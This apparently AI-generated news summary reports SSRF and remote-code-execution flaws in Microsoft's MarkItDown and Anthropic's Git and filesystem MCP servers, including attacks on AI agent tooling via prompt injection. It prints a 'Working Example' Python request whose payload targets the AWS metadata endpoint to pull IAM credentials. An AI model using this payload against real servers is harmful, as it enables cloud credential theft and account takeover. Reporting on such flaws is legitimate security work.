Skip to main content

On This Page
← AI News
AI News Cybersecurity Cloud Security

Microsoft & Anthropic MCP Servers at Risk of RCE, Cloud Takeovers

2 min read
Share

These articles are AI-generated summaries. Please check the original sources for full details.

MCP Servers Carry SSRF Risks

Popular model context protocol (MCP) servers, essential components of AI services, are vulnerable to serious cybersecurity issues. Researchers revealed exploit chains weaponizing Anthropic’s Git and filesystem MCP servers for remote code execution (RCE) and identified a severe server-side request forgery (SSRF) vulnerability in Microsoft’s MarkItDown MCP server.

The rapid growth of AI and autonomous agents has outpaced security considerations, creating a complex threat landscape. While ideal models envision contained AI interactions, the reality is that LLMs now connect to external data sources via MCP servers, often with inadequate security measures, potentially exposing organizations to significant data breaches and unauthorized access – estimated to cost billions annually in remediation and fines.

Key Insights

  • SSRF vulnerability in Microsoft MarkItDown MCP server, January 2026: Allows attackers to access internal resources and potentially retrieve cloud credentials.
  • MCP servers rely on user input for file locations: This creates an inherent risk of SSRF attacks if input is not properly validated.
  • Anthropic’s initial MCP design lacked built-in security: Leaving security implementation to the user resulted in widespread vulnerabilities.

Working Example

# Example of a vulnerable request to MarkItDown MCP server
import requests

# Replace with the actual URL of the MarkItDown server
target_url = "http://example.com/convert"

# Payload to trigger SSRF - attempt to access AWS metadata
payload = {
    "file_uri": "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin-role"
}

try:
    response = requests.post(target_url, data=payload)
    response.raise_for_status()  # Raise HTTPError for bad responses (4xx or 5xx)
    print(response.text)  # Print the response, potentially containing AWS credentials
except requests.exceptions.RequestException as e:
    print(f"Error: {e}")

Practical Applications

  • Financial Institutions: MCP servers used for AI-powered customer service could be exploited to access sensitive customer data.
  • Pitfall: Relying on open-source components without thorough security audits can introduce vulnerabilities like the SSRF issue in MarkItDown.

References:

Continue reading

Next article

Zendesk Instances Leveraged in Mass Spam Campaigns

Related Content

Nov 24, 2025

New Fluent Bit Flaws Expose Cloud to RCE and Stealthy Infrastructure Intrusions

Five critical vulnerabilities in Fluent Bit, used in billions of containers, enable remote code execution and cloud infrastructure takeovers.

Read article
Dec 15, 2025

FreePBX Vulnerabilities Allow RCE via SQL Injection, File Upload, and Auth Bypass

FreePBX patched 2025 flaws allowing SQL injection, file upload attacks, and an auth bypass, potentially leading to remote code execution.

Read article
Jan 20, 2026

Anthropic MCP Git Server Vulnerabilities Enable RCE via Prompt Injection

Three vulnerabilities in Anthropic’s MCP Git server allow remote code execution (RCE) through prompt injection attacks.

Read article